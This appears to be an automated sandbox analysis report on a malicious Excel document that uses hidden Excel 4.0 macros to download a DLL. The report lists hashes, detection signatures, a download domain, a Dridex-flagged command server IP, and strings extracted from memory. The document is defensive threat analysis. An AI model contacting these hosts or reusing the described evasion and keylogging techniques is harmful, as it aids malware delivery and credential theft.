Analysis Report Documents_460000622_1464906353.xls

Overview

General Information

Sample Name: Documents_460000622_1464906353.xls
Analysis ID: 383422
MD5: bcd540201ec5e0301816d194bb15ec30
SHA1: e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
SHA256: a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77F61E FindFirstFileExW, 4_2_6E77F61E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E802EC8 FindFirstFileExA, 4_2_6E802EC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803336 FindFirstFileExA, 4_2_6E803336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803361 FindFirstFileExW, 4_2_6E803361

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: ohior[1].dll.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: whiskyexpanse.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 52.12.4.186:443 -> 192.168.2.22:49170
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\585D4361.emf Jump to behavior
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: whiskyexpanse.com
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000004.00000003.2170206106.0000000000335000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f47754d4c3434
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.passport.com
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
